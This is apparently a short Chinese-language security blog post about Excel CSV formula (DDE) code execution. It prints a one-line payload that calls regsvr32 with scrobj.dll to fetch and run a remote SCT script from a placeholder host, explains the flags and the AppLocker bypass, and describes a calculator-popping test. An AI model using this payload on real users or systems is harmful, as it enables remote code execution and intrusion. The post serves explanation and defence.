Microsoft Excel CSV 文件代码执行

在推特上看到这个攻击,在execl2017测试了一下
在virustotal的评论上说是THOR APT Scanner捕获到的

利用代码

1
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''

简析

因为execl遇到等号就是公式开始的地方,继而执行后面的代码

1
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll

其中的参数:
silent mode (/s)
unregistering (/u)
not calling DLL register server (/n)
passing the required DLL to load via parameter (/i)

scrobj.dll是 Microsoft’s Script Component 运行库,使用这个dll获取并执行Windows Script Component (即sct文件)

而regsvr32 可以绕过AppLocker白名单并执行脚本

测试

默认安装的execl会有安全警告(声明),点启用

又以警告

再点击是,就会弹出计算器(360会拦截regsvr32利用攻击)

references

https://www.virustotal.com/en/file/34b27a622b1ba26f4c7eb8281e84a60b1d5aabcaa454ab1d83b411c86ffaa800/analysis/
https://xorl.wordpress.com/2017/12/11/microsoft-excel-csv-code-execution-injection-method/
https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba
https://twitter.com/G0ldenGunSec/status/939215702073991168

打赏专区